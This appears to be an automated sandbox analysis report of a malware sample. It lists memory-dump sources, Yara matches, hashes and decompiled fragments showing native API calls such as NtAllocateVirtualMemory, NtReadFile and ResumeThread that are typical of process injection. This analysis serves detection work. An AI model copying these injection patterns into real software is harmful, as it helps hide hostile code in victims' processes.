                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0236DEA8,?,?,?,?), ref: 0236DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 265bc10ce2d29903efd2aa67aafe7d963c459222e36f785893d37d984fe191d3
                                                                    • Instruction ID: cc0aeeef16c55cda84cfd3f7ad22dea0e1026bce1452c110dca6a8f97f1c2a64
                                                                    • Opcode Fuzzy Hash: 265bc10ce2d29903efd2aa67aafe7d963c459222e36f785893d37d984fe191d3
                                                                    • Instruction Fuzzy Hash: F511F5B59007099FDB10CF99D488BEEBBF8EB48324F148459E955B7700D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0236DEA8,?,?,?,?), ref: 0236DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 5f9093b0eb7e25037673d4a11d569893a344749051d4bf3f7b6336b6acb0bd0f
                                                                    • Instruction ID: ba360b9feb1e8af6d69ea2640e1ccbca88bac016cc5bc2c0dece5e2fba3694b8
                                                                    • Opcode Fuzzy Hash: 5f9093b0eb7e25037673d4a11d569893a344749051d4bf3f7b6336b6acb0bd0f
                                                                    • Instruction Fuzzy Hash: F71115B9900249CFDB10CF99D588BEEBBF8FB48324F14841AE959A7700C374A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: bc30e86100e0c1dffb27fcec1d9d21f56afd054dd1229ed17fb8ccd2708e3be0
                                                                    • Instruction ID: 6b58739650c7005231d1f9a02e8d82a4f0cef8e956ac6256395fc2cca7323324
                                                                    • Opcode Fuzzy Hash: bc30e86100e0c1dffb27fcec1d9d21f56afd054dd1229ed17fb8ccd2708e3be0
                                                                    • Instruction Fuzzy Hash: 2F1112B59003198FCB20CF99D588BDEBBF8FB48324F14842AD569A3300D374A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293750808.000000000217D000.00000040.00000001.sdmp, Offset: 0217D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bd32641c4fb71d3bb3a1a1317529a987df6ab9a7b1ea64054c6a1570bf46a15
                                                                    • Instruction ID: 9dec89a353e26ff1693113d1ac6b550ac4d425896a69de222d973d83d8426501
                                                                    • Opcode Fuzzy Hash: 4bd32641c4fb71d3bb3a1a1317529a987df6ab9a7b1ea64054c6a1570bf46a15
                                                                    • Instruction Fuzzy Hash: F221D075544248DFDB14DF24E9C4B26BBB5FF88324F24C9A9E84A4B246C336D847CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293750808.000000000217D000.00000040.00000001.sdmp, Offset: 0217D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.292479249.0000000000072000.00000002.00020000.sdmp, Offset: 00070000, based on PE: true
                                                                    • Associated: 00000000.00000002.292463241.0000000000070000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.292721622.00000000000EE000.00000002.00020000.sdmp
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: zsE$zsE
                                                                    • API String ID: 0-453686895
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: zsE$zsE
                                                                    • API String ID: 0-453686895
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JLjH$\xA
                                                                    • API String ID: 0-3391565245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JLjH$\xA
                                                                    • API String ID: 0-3391565245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D0%m
                                                                    • API String ID: 0-3400087780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: S6
                                                                    • API String ID: 0-2440769531
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.300885973.0000000006B10000.00000040.00000001.sdmp, Offset: 06B10000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bd6d36b8fe6892265ea8339635b635343e87b5412565f9d821920825341f09a
                                                                    • Instruction ID: 37f715a85d413412910580878e93fb6f77bd4ba67b84bcf4941a92f42b2fd923
                                                                    • Opcode Fuzzy Hash: 2bd6d36b8fe6892265ea8339635b635343e87b5412565f9d821920825341f09a
                                                                    • Instruction Fuzzy Hash: CE310AB1E11618DFDB58CFABC84468EFBF3AFC8254F04D5AAC508A7228DB305A458F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Executed Functions

C-Code - Quality: 37%
	E00418642(void* __edi) {

		_pop(ss);
		asm("adc bl, [0x29bbc9f1]");
		_t1 = __edi + 0x5e;
		 *_t1 =  *((char*)(__edi + 0x5e)) - 1;
		asm("ficomp dword [ebp+0x1e]");
		if ( *_t1 < 0) goto L3;
	}

Instruction addresses (disassembly column): 0x00418642, 0x00418643, 0x00418649, 0x00418649, 0x0041864c, 0x0041864f
APIs
• NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
Strings
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
• String ID: *9A$A:A
• API String ID: 2738559852-3393056465
• Opcode ID: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
• Instruction ID: 8e57b21a112ab31d7c6b1d6ba0543481a0f6967f1ae2cad0eacb54953c2498bd
• Opcode Fuzzy Hash: 4810ea6e2f94facf85988b5b29332e51c1bc3a2305cc6e82dcbacff4f6941baf
• Instruction Fuzzy Hash: FF21E0B2204109ABDB18DF99DC94EEB77A9AF8C354F158249FA0DA7241C634E851CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
Strings
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
• String ID: A:A
• API String ID: 2738559852-2859176346
• Opcode ID: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
• Instruction ID: 1628b4857647c982ed4431088c360b56197b574895956c7edaea39bee45bd8c3
• Opcode Fuzzy Hash: 40b671ccacba2d23a778ba0ee767292e06d283ac9816c1099dbc126ef6d10228
• Instruction Fuzzy Hash: 6AF0F4B2200108ABCB14DF99DC80EEB77ADAF8C354F058249FE1D97241C630E851CBA0
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 37%
	E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
		intOrPtr _t13;
		void* _t18;
		void* _t27;
		void* _t28;
		intOrPtr* _t29;

		_t13 = _a4;
		_t29 = _t13 + 0xc48;
		E004191F0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
		_t4 =  &_a40; // 0x413a41
		_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t28); // executed
		return _t18;
	}

Instruction addresses (disassembly column): 0x004186a3, 0x004186af, 0x004186b7, 0x004186bc, 0x004186e5, 0x004186e9
APIs
• NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
Strings
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileRead
• String ID: A:A
• API String ID: 2738559852-2859176346
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
• Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
• Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
• Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
• Instruction ID: 4f0e49c2477b0657c67c2fec6e7e8f619a0fbfa7b88b330f09787f3110a3306a
• Opcode Fuzzy Hash: 317a2c0b203aebd36da3fa286c0a94b2c6ad7ddb797753bcf1bbf841c9892b18
• Instruction Fuzzy Hash: EF01AFB2610208BFCB48CF98DC95EEB77A9AF8C754F158249FA0DD7241D630E855CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
• Instruction ID: 6f81bef43f40118dec1e844ade3b44a3cf3814683958c0aa511ea7938e4bdb01
• Opcode Fuzzy Hash: fa9595a296a7c1b530e0e5178a9c926aa6abdc6992919f3d8a3cc550fb1eedaf
• Instruction Fuzzy Hash: ABF01CB2200159AFDB14DF89CC95EE777A9FF8C354F158549FE5997241C630E810CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 628bb7ddc2d89bdd9a17dcf274af848d95d47d288e6c88dabe40ca1f2c3bcb85
• Instruction ID: c91129677ccd3445505f46553bd5734fbe0161a2eaf1ebc3aa535d1cf1cd1d28
• Opcode Fuzzy Hash: 628bb7ddc2d89bdd9a17dcf274af848d95d47d288e6c88dabe40ca1f2c3bcb85
• Instruction Fuzzy Hash: A79002B128100412D1407199841474A0055B7D0341FD1C411A5054994ECA998DD576A5
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c17f5a24287e38a5ab15289429df620e2d40d0ed0063492d7a3536a80874fa03
• Instruction ID: 5d7221135309caf0b1d2c9bffe09f19417c3f68f1ef50c622b56eddde0153ef5
• Opcode Fuzzy Hash: c17f5a24287e38a5ab15289429df620e2d40d0ed0063492d7a3536a80874fa03
• Instruction Fuzzy Hash: 0D9002A13C100452D10071998424B0A0055F7E1341FD1C415E1054994DCA59CC527166
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 738f9b4d780692abea6dadd2ee1aa56ca7b6cb47d737d262b453cdb39114fe07
• Instruction ID: e83c64312eead5accb20eb9df783b020dccb29a71a7a2d2b4f5d2edc26d53456
• Opcode Fuzzy Hash: 738f9b4d780692abea6dadd2ee1aa56ca7b6cb47d737d262b453cdb39114fe07
• Instruction Fuzzy Hash: 619002612C2041625545B199841450B4056B7E02817D1C412A1404D90CC9669856E661
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 98ff1b4205bb89f4e5b42683acc5a11dc4335c1e599d3e30bba2c49424b837ce
• Instruction ID: 5859b99281f828752c0d5765cc6cc97928a0976b74ca719c45b15be1f318f2e6
• Opcode Fuzzy Hash: 98ff1b4205bb89f4e5b42683acc5a11dc4335c1e599d3e30bba2c49424b837ce
• Instruction Fuzzy Hash: 1390027128100423D1117199851470B0059B7D0281FD1C812A0414998DDA968952B161
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fa4b11f262cf179507731785769d282923e3d9cead4b8e015d08a5a21bb0d131
• Instruction ID: a5ede072187105cdbd60e27a7684531511e697a23bdbf04d864790ca11ae15df
• Opcode Fuzzy Hash: fa4b11f262cf179507731785769d282923e3d9cead4b8e015d08a5a21bb0d131
• Instruction Fuzzy Hash: 8890026168100512D1017199841461A005AB7D0281FD1C422A1014995ECE658992B171
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 02dd2059a559bd0f27c89ad62c3a3d3d21bcae25daf8596f16d2cdac20b5e9d8
• Instruction ID: 722dc9b320cbf81a0678970ec7bccaf977dc45cc387f6b38cb7ae195440fd00e
• Opcode Fuzzy Hash: 02dd2059a559bd0f27c89ad62c3a3d3d21bcae25daf8596f16d2cdac20b5e9d8
• Instruction Fuzzy Hash: F290026129180052D20075A98C24B0B0055B7D0343FD1C515A0144994CCD5588616561
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: add6ffd2ee7bc8ae2973fa45b3f462aa08def524f0201961c620fd6263c107a5
• Instruction ID: 0c9119c42f41be9765e3c56b6083bf7a9c9b549037100567e3b3b41ef2a83e2b
• Opcode Fuzzy Hash: add6ffd2ee7bc8ae2973fa45b3f462aa08def524f0201961c620fd6263c107a5
• Instruction Fuzzy Hash: A390027128140412D1007199882470F0055B7D0342FD1C411A1154995DCA65885175B1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6467e665819541cdc6092f17b1f10ca91f9fb28fae85bf84d35d47a38fd259de
• Instruction ID: b01e1b7ac4ce9ef7d35758efff19857be655dfd1c278e5db1bd3a05df8ac1148
• Opcode Fuzzy Hash: 6467e665819541cdc6092f17b1f10ca91f9fb28fae85bf84d35d47a38fd259de
• Instruction Fuzzy Hash: 2490026168100052414071A9C85490A4055BBE12517D1C521A0988990DC999886566A5
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c88cc0c730f70c58575327567ac01a04e147761ed6867706e99b6b750bad3b01
• Instruction ID: b88d5c8944f4943e1dff637254a643d96d29a87e75afc34604b1de8c599721fe
• Opcode Fuzzy Hash: c88cc0c730f70c58575327567ac01a04e147761ed6867706e99b6b750bad3b01
• Instruction Fuzzy Hash: 55900265291000130105B599471450B0096B7D53913D1C421F1005990CDA6188616161
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8c3342f4fe4e4fe1035bf53fdc4beda9e1e99dc52862d6b9d309df24cc357f81
                                                                    • Instruction ID: d1beea0f2f7b44eb6db9e5924a3fae16c2dad8d3d8c7f50ea59af0b4ad336293
                                                                    • Opcode Fuzzy Hash: 8c3342f4fe4e4fe1035bf53fdc4beda9e1e99dc52862d6b9d309df24cc357f81
                                                                    • Instruction Fuzzy Hash: 349002A12820001341057199842461A405AB7E0241BD1C421E10049D0DC96588917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 84215228efea908357f8c03cbc15f1f5bc961cd661a98fa07ffba3b27908a347
                                                                    • Instruction ID: 68acc7c2cb6f437d204a37301466a034312984c62f8ba6759a12375f37bdd74d
                                                                    • Opcode Fuzzy Hash: 84215228efea908357f8c03cbc15f1f5bc961cd661a98fa07ffba3b27908a347
                                                                    • Instruction Fuzzy Hash: 0790027128100412D10075D9941864A0055B7E0341FD1D411A5014995ECAA588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 14f01d77c85b773d02676655feb441ba40dbbad656b363427d4553ac9084d2d5
                                                                    • Instruction ID: 678aa39d0d1e54c6e1436c63be3626c2df286f6318205329a51659a8bb7c63f5
                                                                    • Opcode Fuzzy Hash: 14f01d77c85b773d02676655feb441ba40dbbad656b363427d4553ac9084d2d5
                                                                    • Instruction Fuzzy Hash: 1690027139114412D1107199C41470A0055B7D1241FD1C811A0814998DCAD588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8e56c32d58901eff80433e30ab0d51e5c0b9d734496405d57722fdda2de95b32
                                                                    • Instruction ID: 1e8b2fc457a5f77237784685a7eaae33bb376b716e20a38b98c94db6bd6d39ac
                                                                    • Opcode Fuzzy Hash: 8e56c32d58901eff80433e30ab0d51e5c0b9d734496405d57722fdda2de95b32
                                                                    • Instruction Fuzzy Hash: 0990026929300012D1807199941860E0055B7D1242FD1D815A0005998CCD5588696361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
